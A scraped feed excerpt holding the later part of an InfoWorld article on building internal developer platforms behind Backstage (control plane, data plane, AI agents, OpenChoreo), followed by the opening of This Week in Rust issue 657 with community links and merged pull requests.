<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><tbody><tr><td><strong>Concept</strong></td><td><strong>Description</strong></td></tr><tr><td>Namespace</td><td>A logical grouping of users and resources, typically aligned to a company, business unit, or team. Defines ownership and access boundaries.</td></tr><tr><td>Data plane</td><td>A Kubernetes cluster that hosts one or more deployment environments. You can have multiple data planes for isolation, regional distribution, or scaling.</td></tr><tr><td>Environment</td><td>A runtime context, such as dev, test, staging, or prod, where workloads are deployed and executed. Environments carry their own policies and resource configurations.</td></tr><tr><td>Pipeline</td><td>A defined process that governs how work, such as builds, deployments, promotions, or any automated workflows, flows through the platform. Encodes your operational processes as a platform primitive.</td></tr><tr><td>Component type</td><td>Defines a category of workload—Service, Worker, Cron, Job.</td></tr><tr><td>Trait</td><td>A reusable capability that attaches to any component, such as autoscaling, resilience, observability, and security policies. Compose behaviors without duplicating configuration.</td></tr></tbody></table> </div></figure>



<p>These abstractions separate platform concerns from application concerns. Developers don’t need to know which cluster their code runs on or how environments are wired together. They deploy to “staging” or “prod,” and you define what those terms mean.</p>



<h2 class="wp-block-heading"><a></a>The missing layer is a control plane</h2>



<p>The control plane is where abstractions become real. It sits between the portal and your workload clusters, translating developer intent into infrastructure configuration.</p>



<p>You can think of it as a compiler that targets Kubernetes clusters, converting higher-level abstractions into what Kubernetes and its underlying frameworks understand. It can also apply platform-wide rules during this compilation. Resource limits, security requirements, etc., can be enforced consistently, not merely documented and hoped for.</p>



<p>But compilation is only half the job. The control plane also reconciles continuously. It monitors drift between the declared and actual states. When they diverge, it corrects. Your abstractions remain the source of truth; the control plane enforces them over time.</p>



<h2 class="wp-block-heading"><a></a>Programmability is not optional</h2>



<p>One of the key aspects of this control plane is programmability. If you want your platform to evolve, the control plane needs to be extensible. Different teams have different requirements. New capabilities emerge. You can’t anticipate everything up front.</p>



<p>This means allowing customization of how abstractions compile to Kubernetes manifests. But extensibility without guardrails is dangerous. You need programmability that preserves your invariants. The goal is constrained flexibility, open enough to evolve, structured enough to stay coherent.</p>



<h2 class="wp-block-heading"><a></a>Observable abstractions make the portal useful</h2>



<p>The control plane also aggregates runtime state and associates it with your abstractions. This is what makes the portal useful. Without this, developers piece together information from different tools: Kubernetes dashboard for pod status, Argo CD for the deployment state, Grafana for metrics, Jaeger for traces. Each tool knows part of the story; none shows the full picture.</p>



<p>With the control plane aggregating state, the portal tells a connected story. When a developer opens a component page in Backstage, they see:</p>



<ul class="wp-block-list">
<li>Deployed environments and their status</li>



<li>Current replicas and resource usage</li>



<li>Recent deployments and who triggered them</li>



<li>Logs, metrics, and traces that are scoped to that component, in each environment</li>



<li>Dependencies and their health</li>
</ul>



<p>No context-switching. No reconstructing which pod belongs to which service in which cluster. The abstraction is the anchor; everything else attaches to it.</p>



<p>This only works because the control plane understands both sides. It compiled the abstractions to Kubernetes, so it knows how to map runtime data back. Information flows in both directions. Downward: developer intent flows through the control plane and becomes running workloads. Upward: runtime state flows back through the control plane and appears in the portal.</p>



<p>This is what makes the portal actionable. It’s not just displaying information; it’s connected to a system that can act.</p>



<h2 class="wp-block-heading"><a></a>Data plane: keep it simple</h2>



<p>The data plane is where your workloads actually run. In most cases, this means one or more Kubernetes clusters. The data plane doesn’t know about your abstractions. It understands Kubernetes primitives such as pods, deployments, services, and ingresses. The control plane’s job is to compile your higher-level concepts into these primitives and apply them.</p>



<p>The data plane does one thing: it runs what the control plane tells it to run. The intelligence lives in the control plane; the execution happens in the data plane.</p>



<h2 class="wp-block-heading">Where AI fits into the platform</h2>



<p>AI is now part of every platform conversation, but the architectural question is where it actually belongs.</p>



<p>The abstractions and control plane you’ve built create the foundation. You have well-defined concepts such as components, endpoints, and dependencies. You have a runtime state aggregated and tied to those concepts. You have a connected view of your system. AI agents can definitely leverage this.</p>



<h3 class="wp-block-heading"><a></a>Agents as platform users</h3>



<p>AI agents should be able to interact with your platform as first-class participants. This requires exposing platform capabilities through interfaces that agents can use, such as <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html" data-type="link" data-id="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">Model Context Protocol</a> (MCP) servers, APIs with clear semantics, user-friendly CLIs, and skills that map to platform operations.</p>



<p>These capabilities of the platform enable agents to create components, trigger builds and deployments, query environment status, and reason about dependencies. They help you and your developers become more productive.</p>



<h3 class="wp-block-heading"><a></a>Agents as platform capabilities</h3>



<p>You can also embed agents inside your platform to help your teams’ day-to-day operations. Here are some examples of agents you can develop:</p>



<ul class="wp-block-list">
<li>SRE agents: Analyze logs, metrics, and traces to surface likely root causes. Instead of developers digging through dashboards, the agent correlates signals and suggests where to look.</li>



<li>FinOps agents: Help teams understand and optimize resource costs across environments and components.</li>



<li>Architect agents: Assist with system design decisions, such as dependency analysis, capacity planning, and migration impact assessment.</li>
</ul>



<p>These agents work because they have access to the control plane’s unified view. They see abstractions, runtime state, and observability data in one place, the same connected story developers see in the portal.</p>



<p>The pattern holds. Good abstractions make everything easier, including AI.</p>



<h2 class="wp-block-heading"><a></a>OpenChoreo as a reference implementation</h2>



<p><a href="https://github.com/openchoreo/openchoreo" data-type="link" data-id="https://github.com/openchoreo/openchoreo">OpenChoreo</a> is an open-source developer platform for Kubernetes. It was recently accepted into the CNCF as a sandbox project. OpenChoreo implements the architecture described in this article: developer abstractions backed by a control plane, a Backstage-powered portal, integrated CI/CD and GitOps, and observability wired to your abstractions.</p>



<p>If you’re building this architecture yourself, OpenChoreo is worth studying as a reference, even if you don’t adopt it directly. The project demonstrates how these pieces fit together: how abstractions compile into Kubernetes resources, how runtime state flows back to the portal, and how guardrails are enforced during compilation.</p>



<p>You can use OpenChoreo as a complete platform, or install its Backstage plugins into your existing portal and use just the control plane layer. Either way, the underlying patterns are what matter. The architecture is the idea. OpenChoreo is one way to implement it.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/image_04_multi_plane_architecture.png?w=1024" alt="image_04_multi_plane_architecture" class="wp-image-4189109" width="1024" height="552" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">WSO2</p></div>



<h2 class="wp-block-heading">A useful mental model: multi-plane architecture</h2>



<p>OpenChoreo separates concerns across five planes:</p>



<ol class="wp-block-list">
<li>Experience plane: Where developers, platform engineers, and SREs interact with the platform via the Backstage-powered portal, CLI, GitOps, or AI agents.</li>



<li>Control plane: The brain that translates high-level abstractions (components, APIs, environments, pipelines) into Kubernetes manifests. Programmable through component types and traits, so you can extend it without forking or writing low-level controllers. Continuously reconciles the runtime state back into those abstractions.</li>



<li>Data plane: Where workloads run. Enforces the semantics of your abstractions, such as project isolation, traffic policies, and security boundaries. These aren’t just configurations; the platform guarantees them.</li>



<li>Observability plane: Feeds metrics, logs, and traces back through the same abstractions developers already understand, requiring no translation.</li>



<li>Workflow plane (optional): Handles builds using Cloud Native Buildpacks and Argo Workflows by default.</li>
</ol>



<p>These planes work together but remain separate concerns. You can reason about each independently, evolve them at different rates, and deploy them flexibly: a single cluster with namespace isolation for dev/test, fully separated multi-cluster setups for production, or hybrid topologies that colocate planes like Control and CI for cost efficiency.</p>



<h2 class="wp-block-heading"><a></a>AI and OpenChoreo</h2>



<p>OpenChoreo is being built to treat AI agents as first-class participants. In OpenChoreo 1.0, external agents can interact with the platform via MCP servers, agent skills, or the CLI to generate and edit component configurations, reason about releases and environments, and more. The built-in SRE Agent is a first example of this. It analyzes logs, metrics, and traces from your deployments and uses LLMs to surface likely root causes and actionable insights.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/Image_05_external_internal_agents_openchoreo.png?w=1024" alt="Image_05_external_internal_agents_openchoreo" class="wp-image-4189115" width="1024" height="584" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">WSO2</p></div>



<h2 class="wp-block-heading">From portal to platform</h2>



<p>Backstage solved the portal problem. It gave you a unified interface for catalogs, documentation, and golden paths. But a portal isn’t a platform. There’s a gap between what developers see and what’s actually running, and that’s where you get stuck. You fill it with point-to-point integrations, custom plugins, and scripts that become their own maintenance burden.</p>



<p>The pattern that works is portal, control plane, data plane: </p>



<ul class="wp-block-list">
<li>A portal that gives developers ready access to catalogs, documentation, and templates.</li>



<li>A control plane that compiles platform abstractions, reconciles drift, and aggregates runtime state.</li>



<li>A data plane that runs workloads and enforces guarantees.</li>
</ul>



<p>Whether you build this yourself or you adopt something like OpenChoreo, the architecture matters more than the tools. Get the layers right, and new capabilities slot in cleanly. Get them wrong, and every feature request becomes a project.</p>



<p>Backstage gives you the front door. The real platform begins behind it.</p>



<p><em>—</em></p>



<p><a href="https://www.infoworld.com/blogs/new-tech-forum"><strong><em>New Tech Forum</em></strong></a><em><strong> provides a venue for technology leaders—including vendors and other outside contributors—to explore and discuss emerging enterprise technology in unprecedented depth and breadth. The selection is subjective, based on our pick of the technologies we believe to be important and of greatest interest to InfoWorld readers. InfoWorld does not accept marketing collateral for publication and reserves the right to edit all contributed content. Send all </strong></em><em><strong>inquiries to </strong></em><a href="mailto:doug_dineley@foundryco.com"><strong><em>doug_dineley@foundryco.com</em></strong></a><em><strong>.</strong></em></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[This Week In Rust: This Week in Rust 657]]></title>
<description><![CDATA[Hello and welcome to another issue of This Week in Rust!
Rust is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
@thisweekinrust.bsky.social on Bluesky or
@ThisWeekinRu...]]></description>
<link>https://tsecurity.de/de/3623222/tools/this-week-in-rust-this-week-in-rust-657/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623222/tools/this-week-in-rust-this-week-in-rust-657/</guid>
<pubDate>Thu, 25 Jun 2026 04:09:06 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello and welcome to another issue of <em>This Week in Rust</em>!
<a href="https://www.rust-lang.org/">Rust</a> is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
<a href="https://bsky.app/profile/thisweekinrust.bsky.social">@thisweekinrust.bsky.social</a> on Bluesky or
<a href="https://mastodon.social/@thisweekinrust">@ThisWeekinRust</a> on mastodon.social, or
<a href="https://github.com/rust-lang/this-week-in-rust">send us a pull request</a>.
Want to get involved? <a href="https://github.com/rust-lang/rust/blob/main/CONTRIBUTING.md">We love contributions</a>.</p>
<p><em>This Week in Rust</em> is openly developed <a href="https://github.com/rust-lang/this-week-in-rust">on GitHub</a> and archives can be viewed at <a href="https://this-week-in-rust.org/">this-week-in-rust.org</a>.
If you find any errors in this week's issue, <a href="https://github.com/rust-lang/this-week-in-rust/pulls">please submit a PR</a>.</p>
<p>Want TWIR in your inbox? <a href="https://this-week-in-rust.us11.list-manage.com/subscribe?u=fd84c1c757e02889a9b08d289&amp;id=0ed8b72485">Subscribe here</a>.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-rust-community">Updates from Rust Community</a></h4>


<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#foundation">Foundation</a></h5>
<ul>
<li><a href="https://rustfoundation.org/media/rust-foundation-welcomes-openai-as-platinum-member-announces-donation-to-rust-project/">Rust Foundation Welcomes OpenAI As Platinum Member</a></li>
<li><a href="https://rustfoundation.org/media/rust-commercial-network-launches-to-bring-commercial-users-of-rust-language-together/">Rust Commercial Network Launches to Unite Commercial Users of Rust</a></li>
<li><a href="https://rustfoundation.org/media/mainmatter-is-bringing-hands-on-rust-training-to-upskilling-week-in-barcelona/">Mainmatter Is Bringing Hands-On Rust Training</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#newsletters">Newsletters</a></h5>
<ul>
<li><a href="https://www.theembeddedrustacean.com/p/the-embedded-rustacean-issue-74">The Embedded Rustacean Issue #74</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#projecttooling-updates">Project/Tooling Updates</a></h5>
<ul>
<li><a href="https://bevy.org/news/bevy-0-19">Bevy 0.19</a></li>
<li><a href="https://blog.image-rs.org/2026/06/18/png-adoption.html">Rust PNG crate gets even faster, used by GNOME and Chromium</a></li>
<li><a href="https://github.com/kunobi-ninja/kache/releases/tag/v0.7.0">kache 0.7.0: caching real-world C/C++ trees</a></li>
<li><a href="https://www.willsearch.com.br/blog/2026/06/23/new-feature-in-guardiandb-introducing-the-odm-object-document-mapper-layer/">New Feature in GuardianDB: Introducing the ODM (Object Document Mapper) Layer</a></li>
<li><a href="https://shnatsel.medium.com/safe-simd-in-rust-even-on-the-inside-c6f1ff381828">Safe SIMD in Rust, even on the inside</a></li>
<li><a href="https://ratatui.rs/highlights/v0302/">Ratatui 0.30.2 is released - a Rust library for cooking up terminal user interfaces</a></li>
<li><a href="https://dev.to/alexandr_litvinov/adding-a-post-quantum-hybrid-handshake-to-a-rust-vpn-pk8">Adding a post-quantum hybrid handshake to a Rust VPN</a></li>
<li><a href="https://tensor4all.org/blog/introducing-tenferro-rs/">From Julia to Rust: a differentiable tensor stack for scientific computing in the agentic AI era</a></li>
<li><a href="https://hotpath.rs/blog/profiling-async-rust">hotpath-rs 0.18: Profiling Async and Concurrent Rust - Channels and Lock Contention</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#observationsthoughts">Observations/Thoughts</a></h5>
<ul>
<li><a href="https://blog.cloudflare.com/hyper-bug/">How we found a bug in the hyper HTTP library</a></li>
<li><a href="https://corrode.dev/podcast/s06e06-clickhouse/">ClickHouse with Alexey Milovidov and Austin Bonander</a></li>
<li><a href="https://kerkour.com/iroh-v1-p2p">Deep dive into iroh: A replacement for WireGuard or a peer-to-peer layer for your application?</a></li>
<li><a href="https://kobzol.github.io/rust/2026/06/21/optimizing-sqlx-test-rebuild-time.html">Optimizing #[sqlx::test] rebuild time</a></li>
<li><a href="https://bitfieldconsulting.com/posts/rewrite-in-rust">Rewriting the world in Rust</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-walkthroughs">Rust Walkthroughs</a></h5>
<ul>
<li><a href="https://docs.litellm.ai/blog/litellm-rust-launch">Migrating LiteLLM to Rust - Building the Fastest and Litest AI Gateway</a></li>
<li><a href="https://medium.com/@shnatsel/safe-simd-in-rust-even-on-the-inside-c6f1ff381828">Safe SIMD in Rust, even on the inside</a></li>
<li><a href="https://blog.sheerluck.dev/posts/learn-rust-async-await-by-building-an-http-server/">Learn Rust Async/Await, Tokio, and TCP Networking by Building an HTTP/1.1 Server</a></li>
<li><a href="https://blog.sheerluck.dev/posts/build-breakout-in-bevy-step-by-step/">Building Breakout in Bevy: Step by Step</a></li>
<li><a href="https://medium.com/@vbasky/porting-200-000-lines-of-c-to-rust-building-a-byte-identical-mediainfo-replacement-8e9b587d469a">Porting 300,000 Lines of C++ and Perl to Rust: A Dual-Oracle Media Metadata Engine</a></li>
<li><a href="https://corentin-core.github.io/posts/ruxe-type-level-disjointness/">A data race that doesn't compile</a></li>
<li>[video] <a href="https://www.youtube.com/watch?v=RKojTb9IVJc">RustCurious lesson 9: Traits are Interfaces</a></li>
<li>[Video] <a href="https://www.youtube.com/watch?v=X8GDc2AtbG8">BAML: a new programming language (created in Rust)</a></li>
<li>[Video] <a href="https://www.youtube.com/watch?v=O3YWQvNqwHc">The Future of Version Control</a></li>
<li>[Video] <a href="https://www.youtube.com/watch?v=1Xz1E_27Uqc">Borrowing Beauty: My Beginner's Quest to Create Approachable Bevy &amp; Rust Code</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#crate-of-the-week">Crate of the Week</a></h4>
<p>This week's crate is <a href="https://github.com/orium/cargo-rdme">cargo-rdme</a>, a </p>
<p>Thanks to <a href="https://users.rust-lang.org/t/crate-of-the-week/2704/1616">Diogo Sousa</a> for the self-suggestion!</p>
<p><a href="https://users.rust-lang.org/t/crate-of-the-week/2704">Please submit your suggestions and votes for next week</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#calls-for-testing">Calls for Testing</a></h4>
<p>An important step for RFC implementation is for people to experiment with the
implementation and give feedback, especially before stabilization.</p>
<p>If you are a feature implementer and would like your RFC to appear in this list, add a
<code>call-for-testing</code> label to your RFC along with a comment providing testing instructions and/or
guidance on which aspect(s) of the feature need testing.</p>
<p><em>No calls for testing were issued this week by
<a href="https://github.com/rust-lang/rust/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rust</a>,
<a href="https://github.com/rust-lang/cargo/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/rustup/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rustup</a> or
<a href="https://github.com/rust-lang/rfcs/issues?q=label%3Acall-for-testing%20state%3Aopen">Rust language RFCs</a>.</em></p>
<p><a href="https://github.com/rust-lang/this-week-in-rust/issues">Let us know</a> if you would like your feature to be tracked as a part of this list.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#call-for-participation-projects-and-speakers">Call for Participation; projects and speakers</a></h4>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-projects">CFP - Projects</a></h5>
<p>Always wanted to contribute to open-source projects but did not know where to start?
Every week we highlight some tasks from the Rust community for you to pick and get started!</p>
<p>Some of these tasks may also have mentors available, visit the task page for more information.</p>




<ul>
<li><a href="https://github.com/aimdb-dev/aimdb/issues/116">AimDB - Non-blocking fallible <code>try_produce</code> for bounded / non-overwriting buffers</a></li>
<li><a href="https://github.com/aimdb-dev/aimdb/issues/99">AimDB - Add minimal example: hello-mailbox-async</a></li>
</ul>
<p>If you are a Rust project owner and are looking for contributors, please submit tasks <a href="https://github.com/rust-lang/this-week-in-rust?tab=readme-ov-file#call-for-participation-guidelines">here</a> or through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-events">CFP - Events</a></h5>
<p>Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.</p>



<p>If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-the-rust-project">Updates from the Rust Project</a></h4>
<p>515 pull requests were <a href="https://github.com/search?q=is%3Apr+org%3Arust-lang+is%3Amerged+merged%3A2026-06-16..2026-06-23">merged in the last week</a></p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler">Compiler</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/157926">implement <code>#[diagnostic::on_unknown]</code> for modules</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158042">outline part of <code>evaluate_goal_raw</code> into its own <code>#[cold]</code> function</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157967">preserve <code>track_caller</code> for by-value dyn vtable shims</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#library">Library</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/156983">add <code>io::Read::read_le</code> and <code>io::Read::read_be</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/155616">constify <code>TryFrom&lt;Vec&gt;</code> for array</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157878"><code>impl [const] Default for BTreeMap</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157912">stabilize <code>str_from_utf16_endian</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158012">stabilize <code>strip_circumfix</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/141266">stabilize <code>substr_range</code> and <code>subslice_range</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cargo">Cargo</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/cargo/pull/17112"><code>diag</code>: Support <code>build.warnings</code> for cargo lints</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17117"><code>add</code>: list too-new versions and how to override</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17123"><code>host-config</code>: dont apply target config to host artifacts</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17107"><code>install</code>: Run cargo lints like rustc lints</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17118"><code>resolver</code>: hint how to resolve too-new versions</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17127"><code>test</code>: skip dwp uplift test without packed debuginfo</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17110">add Solaris fcntl file locking</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17012"><code>-Zmin-publish-age</code></a> (RFC <a href="https://rust-lang.github.io/rfcs/3923-cargo-min-publish-age.html">#3923</a>)</li>
<li><a href="https://github.com/rust-lang/cargo/pull/17108">improved the test error messages when 'rustc -V' fails</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17115">remove windows-sys dependencies older than 0.61</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#clippy">Clippy</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16931">add lint to suggest <code>as_chunks</code> over <code>chunks_exact</code> with constant</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16252">new <code>unnecessary_unwrap_unchecked</code>: lint</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/15907"><code>extra_unused_type_parameters</code>: don't suggest an autofix</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17001"><code>let_underscore_future</code>: skip bindings with an explicit type annotation</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16976">avoid ICE when evaluating constants containing unsized type args</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16928">avoid <code>map_unwrap_or</code> fix when default is adjusted</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17256">do not check for unused lifetimes in expanded code</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17249">don't trigger <code>unnecessary_box_returns</code> when the size depends on generics</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17243">find a shared context for the format string and the <code>format!</code> call</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17205">fix OOM panic for large types on uninit check</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16964">fix <code>std_instead_of_core</code>: false positives for <code>core::io</code>/MSRV</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16926"><code>manual_slice_fill</code> detect for in loops over <code>&amp;mut [T; N]</code> slices</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17239">merge comment and cfg checking in <code>matches</code> lint pass</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17266">perf: check the method name first in <code>or_fun_call</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17265">perf: compare method names before type queries in three lint passes</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17275">perf: run structural checks before const context queries in <code>question_mark, manual_clamp</code> and ranges</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17272">perf: skip <code>match_same_arms</code> work when the lint is allowed</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17226">perf: skip tokenizing in <code>span_contains_cfg</code> when no '#' is present</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17278">treat <code>!</code> the same as <code>-</code> in <code>unnecessary_cast</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-analyzer">Rust-Analyzer</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22618"><code>assists/replace_match_with_if_let</code>: don't parenthesize if-let guards</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22617"><code>implements_trait_unique_with_infcx</code>: only forbid the self type from being an error type</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22516">bye bye ted</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22627">do not visit nodes in GC multiple times</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22594">MIR eval mixed bit and byte sizes</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22599">check for <code>#[cfg]s</code> in tail expression macros</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22601">crash on static constants in array length positions</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22486">don't complete <code>.await</code> on receivers of unknown type</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22621">don't panic on out-of-range integer literals in const positions</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22351">migrate merge imports to editor</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-compiler-performance-triage">Rust Compiler Performance Triage</a></h5>
<p>This week had a lot of big swings, with two significant perf regressions that are accepted
because they unlock future features and perf improvements.
We also saw large improvements in the next trait solver due to the performance optimization work happening there.</p>
<p>Triage done by <strong>@JonathanBrouwer</strong> with help from <strong>@Kobzol</strong>.
Revision range: <a href="https://perf.rust-lang.org/?start=b5d46ecb51c3e4134b82570cfe718f093daa6390&amp;end=8b6558a02b2774acfb25cf15e199467c37ba7490&amp;absolute=false&amp;stat=instructions%3Au">b5d46ecb..8b6558a0</a></p>
<p><strong>Summary</strong>:</p>
<table>
<thead>
<tr>
<th>(instructions:u)</th>
<th>mean</th>
<th>range</th>
<th>count</th>
</tr>
</thead>
<tbody>
<tr>
<td>Regressions ❌ <br> (primary)</td>
<td>0.9%</td>
<td>[0.2%, 2.7%]</td>
<td>184</td>
</tr>
<tr>
<td>Regressions ❌ <br> (secondary)</td>
<td>1.0%</td>
<td>[0.1%, 4.2%]</td>
<td>160</td>
</tr>
<tr>
<td>Improvements ✅ <br> (primary)</td>
<td>-0.3%</td>
<td>[-0.3%, -0.2%]</td>
<td>2</td>
</tr>
<tr>
<td>Improvements ✅ <br> (secondary)</td>
<td>-11.8%</td>
<td>[-69.9%, -0.2%]</td>
<td>25</td>
</tr>
<tr>
<td>All ❌✅ (primary)</td>
<td>0.8%</td>
<td>[-0.3%, 2.7%]</td>
<td>186</td>
</tr>
</tbody>
</table>
<p>5 Regressions, 3 Improvements, 2 Mixed; 4 of them in rollups
30 artifact comparisons made in total</p>
<p><a href="https://github.com/rust-lang/rustc-perf/blob/660052c17ccde865dff7c7ffd525affa0550c846/triage/2026/2026-06-21.md">Full report here</a></p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#approved-rfcs"></a><a href="https://github.com/rust-lang/rfcs/commits/master">Approved RFCs</a></h5>
<p>Changes to Rust follow the Rust <a href="https://github.com/rust-lang/rfcs#rust-rfcs">RFC (request for comments) process</a>. These
are the RFCs that were approved for implementation this week:</p>
<ul>
<li><em>No RFCs were approved this week.</em></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#final-comment-period">Final Comment Period</a></h5>
<p>Every week, <a href="https://www.rust-lang.org/team.html">the team</a> announces the 'final comment period' for RFCs and key PRs
which are reaching a decision. Express your opinions now.</p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#tracking-issues-prs">Tracking Issues &amp; PRs</a></h6>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust"></a><a href="https://github.com/rust-lang/rust/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Rust</a>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/157497">rustc_lint: Allow scoped <code>non_ascii_idents</code> lint levels</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157857">Stabilize <code>#[my_macro] mod foo;</code> (part of <code>proc_macro_hygiene</code>)</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/134021">Implement <code>IntoIterator</code> for <code>[&amp;[mut]] Box&lt;[T; N], A&gt;</code></a></li>
<li><a href="https://github.com/rust-lang/rust/issues/129436">Tracking Issue for <code>string_from_utf8_lossy_owned</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156508">Infer all anonymous lifetimes in assoc consts as <code>'static</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157820">consider subtyping when checking if an infer var is sized</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156749">remove <code>box_patterns</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156976">enable eager <code>param_env</code> norm in new solver</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/153563">Lint against iterator functions that panic when <code>N</code> is zero</a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#leadership-council"></a><a href="https://github.com/rust-lang/leadership-council/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Leadership Council</a>
<ul>
<li><a href="https://github.com/rust-lang/leadership-council/issues/298">Start a t-project-structure/t-comprehensibility</a></li>
</ul>
<p><em>No Items entered Final Comment Period this week for
